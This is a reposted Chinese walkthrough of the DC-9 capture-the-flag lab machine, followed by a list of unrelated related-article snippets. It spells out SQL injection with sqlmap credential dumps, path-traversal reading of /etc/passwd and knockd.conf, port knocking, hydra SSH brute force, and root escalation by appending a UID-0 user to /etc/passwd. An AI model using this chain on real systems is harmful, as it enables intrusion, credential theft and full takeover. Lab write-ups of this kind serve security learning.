DC-9靶机(端口敲门服务Knockd)

news2024/10/2 10:24:46

DC-9靶机地址

image-20230810194354682

信息收集

主机发现

靶机MAC:00:0C:29:5A:C1:F4

arp-scan -l

image-20230811194022808

端口扫描

nmap -A -p- 192.168.80.142

image-20230811194057787

访问80端口

image-20230811194115368

目录爆破

dirsearch -u 192.168.80.139 -i 200

image-20230811194207108

点击页面上的四个标签,发现 有个搜索 框,有个登录框

image-20230810200559430

先用bp抓个包

image-20230811194252087

image-20230811194321526

发送到Repeater,修改 参数,看页面有没有变化

当请求参数变成1' or 1=1的时候,页面发生变化,存在sql注入漏洞问题!

image-20230811194500948

漏洞利用

Request请求参数全部导入文件里,然后通过sqlmap来破解数据库

image-20230811194934323

文件名,自己随意

image-20230811194716648

然后开始爆破数据库 sqlmap通过-r参数,读取请求的数据,来爆破数据库

sqlmap -r dc9.txt -D  Staff  --tables   --batch

image-20230811194949358

发现有两个数据库Staff和users

先爆破Staff

sqlmap -r dc9.txt -D  Staff  --tables   --batch

image-20230811195050655

继续暴字段

sqlmap -r dc9.txt -D  Staff  -T Users --columns --batch

image-20230811195252359

得到用户名和密码

sqlmap -r dc9.txt -D  Staff  -T Users -C Password,Username --dump

image-20230811195442165

image-20230811195547685

其实也不是去解密网站解密,刚暴出来的用户名和密码两个字段已经把明文给出来了,密文后面跟的就是明文:transorbital1

第一个数据库知道了用户admin 密码transorbital1

然后再去暴第二个数据库users库,只有一个UserDetails

sqlmap -r dc9.txt -D users --tables --batch 

image-20230811195951499

sqlmap -r dc9.txt -D users -T UserDetails --columns --batch

image-20230811200027460

sqlmap -r dc9.txt -D users -T UserDetails -C username,password  --dump

得到需用普通用户的用户名和密码

在这里插入图片描述

可以先把这些普通用户复制到一个文件里,后面可能用得上

vim 1.txt,把账户密码复制进去

image-20230811200417365

通过awk命令过滤列,取出先要的用户和密码

awk -F'|' '{print $2}'  1.txt > user.txt
awk -F'|' '{print $3}'  1.txt > passwd.txt

过滤完发现有空格,在末行模式下输入:%s/ //g把空格替换为空,删除多余的空行就在这里插入图片描述

在这里插入图片描述

数据清洗完成后,访问web网站,点击Manage选项,登录admin用户

image-20230811201258902

image-20230811201356634

尝试是否存在文件包含漏洞

http://192.168.80.142/manage.php?file=../../../../../../../../../../../etc/passwd

image-20230811201556215

发现有很多用户

image-20230811201919112

可以尝试hydra爆破ssh端口,但是在端口扫描的时候发现ssh的服务并不是open状态,而是filtered

端口敲门服务

端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

靶机-简单谈一下端口碰撞技术 (Port Knocking)

knock:端口敲门服务 _

靶机使用了knockd进行防护,用来隐藏ssh登陆端口

knockd 服务的默认配置路径:/etc/knockd.conf

http://192.168.80.142/manage.php?file=../../../../../../../../../../../etc/knockd.conf

image-20230811202744147

使用7469 8475 9842暗号敲门

knock 192.168.80.142  7469 8475 9842

image-20230811203339621

image-20230811203520625

关闭后也可以使用nc命令依次敲门

nc 192.168.80.142  7469
nc 192.168.80.142  8475
nc 192.168.80.142  9842

image-20230811203705583

ssh服务已经开启,使用九头蛇密码爆破

hydra -L user.txt  -P passwd.txt ssh://192.168.80.142

image-20230811203923790

ssh连接,当切换到janitor用户时,家目录有个隐藏目录

image-20230811204256261

image-20230811204405211

将密码复制到前面过滤出来的密码文件里,再次使用九头蛇爆破ssh

发现除了刚刚爆破的三个用户之外,又多了一个用户

image-20230811204645747

提权

image-20230811204800120

发现一个test路径。经过查看发现test是一个python文件,接下来使用查找命令,查看这个python文件:

image-20230811205301446

cd /opt/devstuff

image-20230811205855456


openssl passwd 手动生成密码

openssl passwd计算密码Hash

使用openssl生成一个加密的密码,由于/tmp目录可写,所以直接将伪用户输入到该目录下;

openssl passwd -1 -salt Egon Egon

$1$admin$1kgWpnZpUx.vTroWPXPIB0

然后构造成跟/etc/passwd下的一样的格式,保存在pass文件中

/etc/passwd格式:

用户名:密码hash值:uid:gid:说明:家目录:登陆后使用的shell

echo 'admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0::/root:/bin/bash' > /tmp/passwd

$1$表示使用MD5算法;$2a$表示使用Blowfish算法;

$2y$是另一算法长度的Blowfish;$5$表示SHA-256算法;$6$表示SHA-512算法;

目前基本上都使用sha-512算法的,但无论是md5还是sha-256都仍然支持;

$salt$是加密时使用的salt,hashed才是真正的密码部分;

再运行刚刚发现的test.py/tmp/passwd写入到/etc/passwd

sudo /opt/devstuff/dist/test/test  /tmp/passwd /etc/passwd

使用 su命令切换刚刚创建的用户

image-20230811211247911

image-20230811211305255

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/865177.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

atxserver2环境搭建

1. 卸载python3.11.4版本 $sudo rm -rf /Library/Frameworks/Python.framework/Versions/3.11/ $sudo rm -rf /Applications/Python\ 3.11/ 第三步:删除指向python的链接 cd /usr/local/bin/ ls -l /usr/local/bin | grep /Library/Frameworks/Python.framework/…

利用logstash将graylog日志传输到kafka中

1.graylog配置输出 在System-outputs,选择GELF Output,填写如下内容,其它选项默认 在要输出的Stream中,选择Manage Outputs 选择GELF Output,右边选择刚才创建好的test。 2.安装logstash,作为中间临时…

Vue 整合 Element UI 、路由嵌套和参数传递(五)

一、整合 Element UI 1.1 工程初始化 使用管理员的模式进入 cmd 的命令行模式,创建一个名为 hello-vue 的工程,命令为: # 1、目录切换 cd F:\idea_home\vue# 2、项目的初始化,记得一路的 no vue init webpack hello-vue 1.2 安装…

记录一次使用python调用java代码

Python调用Java代码的主要原理是通过使用Java虚拟机(JVM)和相关的库/工具实现的。 在Python中,可以使用以下几种方式来调用Java代码: 使用subprocess模块:可以通过subprocess模块来启动一个子进程,并在子进…

OpenGL纹理

纹理采样器----纹理坐标 只有纹理坐标,纹理没有作用。 纹理坐标是在顶点着色器中设置,需要传入片段着色器,在片段着色器中需要定义纹理采样器。 然后调用texture函数利用采样器和纹理坐标对纹理进行采样。 我们使用GLSL内建的texture函数…

大模型落地金融业,想象力在哪?

金融大模型的难点在于,能否在产业中扎得更深;其颠覆性也更建立在,纵深到产业中去,赋能金融行业的长尾场景发展,以及重拾“金融信任”。 作者|思杭 编辑|皮爷 出品|产业家 “从经济角度讲,整个金融业…

界面设计用什么工具好?还不知道这5个吗?

无论是在APP设计,还是网站设计中,界面设计都是非常重要的,今天本文将为大家推荐5个优质的界面设计软件,一起来看看吧! 1、即时设计 即时设计是新一代界面设计软件,它不仅为设计师提供了精细的矢量编辑功能…

纯C#使用Visionpro工具1

各个工具的程序集名称 一般分类 一般情况是去掉Tool和Cog就是命名空间,如CogBlobTool对应于Cognex.Visionpro.Blob 也有特殊情况 忘了怎么办 可以借用ToolBlock引入工具后打开高级脚本查看 了解工具类和对象

过河卒(c++题解)

题目描述 棋盘上 A 点有一个过河卒,需要走到目标 B 点。卒行走的规则:可以向下、或者向右。同时在棋盘上 C 点有一个对方的马,该马所在的点和所有跳跃一步可达的点称为对方马的控制点。因此称之为“马拦过河卒”。 棋盘用坐标表示&#xff…

【Tool】虚拟机安装与调试与设置与主机共享文件

前言 安装了vm17,实现了与主机文件共享, 步骤 下载虚拟机(试用版) Download VMware Workstation Pro 双击安装 暂不激活或者 使用如下激活码 KRNJX-22GXY-HCW46-MWYHY-YWRDB RDHTN-YFFKY-8YVR7-Q996Y-K74X3 N2XRH-GCH84-MV…

Linux系统上多文件C程序的编译与调试

一、先建立一个头文件add.h 通过vi创建一个add.h,并进行编写该文件,用来存放求和函数add()的声明: 二、建立一个add.c文件 通过vi创建一个add.c文件,并进行编写,用来存放求和函数add()的实现: 三、建立一…

写给 Android 应用工程师的 Binder 原理剖析

一. 前言 这篇文章我酝酿了很久,参考了很多学习文档,读了很多源码,却依旧不敢下笔。生怕自己理解上还有偏差,对大家造成误解,贻笑大方。又怕自己理解不够透彻,无法用清晰直白的文字准确的表达出 Binder 的…

构建之法 - 软件工程实践教学:一线教师的13问

福州大学单红老师的软工课程总结 2020春,不一样的学期不一样的软工实践 单红⽼师在总结中,提出了13条疑惑,《构建之法》的作者邹欣⽼师就单红⽼师提出的每⼀条疑惑,给出了⾃⼰的思考,与他进⾏探讨交流。欢迎你也来参与…

怎么系统的学习机器学习、深度学习?当然是看书了

目录 前言 内容简介 学完本书,你将能够 作者简介 本书目录 京东自购链接 前言 近年来,机器学习方法凭借其理解海量数据和自主决策的能力,已在医疗保健、 机器人、生物学、物理学、大众消费和互联网服务等行业得到了广泛的应用。自从Ale…

新机器到了要做的事情

文章目录 新机器到了要做的事情背景检查机器安装系统装系统步骤 总结 新机器到了要做的事情 背景 运维 一台机器到了,去看看机器情况,小编之前是开发呀,由于种种原因,阴差阳错的做了运维,本以为是应用运维&#xff0c…

《Java-SE-第三十四章》之Optional

前言 在你立足处深挖下去,就会有泉水涌出!别管蒙昧者们叫嚷:“下边永远是地狱!” 博客主页:KC老衲爱尼姑的博客主页 博主的github,平常所写代码皆在于此 共勉:talk is cheap, show me the code 作者是爪哇岛的新手,水平很有限&…

2023/8/11题解

时间限制: 1000MS 内存限制: 65536KB 解题思路 建树 模拟 &#xff0c;复杂在于建树&#xff0c;此处从题目需求可知需要按层建树&#xff0c;所以需要队列模拟&#xff0c;查找比较容易就是普通的深搜 参考代码 #include<bits/stdc.h> using namespace std; vector<…

【自用】云服务器 使用 docker 搭建 HomeAssistant + MQTT 物联网平台

总览 1.搭建流程概述 2.准备工作 3.开始搭建&#xff01; 4.总结 如果想看 ESP32 或其他使用 MicroPython 编程的单片机如何连接到该云服务器&#xff0c;实现 HomeAssistant 控制 单片机的内容&#xff0c;请看我这篇博客的下一篇。 一、搭建流程概述 0.总体流程 我们需要…

Excel小技巧揭秘:结合3行Bat代码,轻松提升工作效率

在日常工作中&#xff0c;Excel是一个不可或缺的工具&#xff0c;而掌握一些小技巧可以大大提升我们的工作效率。今天&#xff0c;我们将介绍一种巧妙的方法&#xff0c;结合仅有3行Bat代码&#xff0c;让你在Excel中实现更多的功能&#xff0c;让同事们都会对你赞叹不已&#…

宋浩高等数学笔记(十一)曲线积分与曲面积分

个人认为同济高数乃至数学一中最烧脑的一章。。。重点在于计算方式的掌握&#xff0c;如果理解不了可以暂时不强求&#xff0c;背熟积分公式即可。此外本贴暂时忽略两类曲面积分之间的联系&#xff0c;以及高斯公式的相关内容&#xff0c;日后会尽快更新&#xff0c;争取高效率…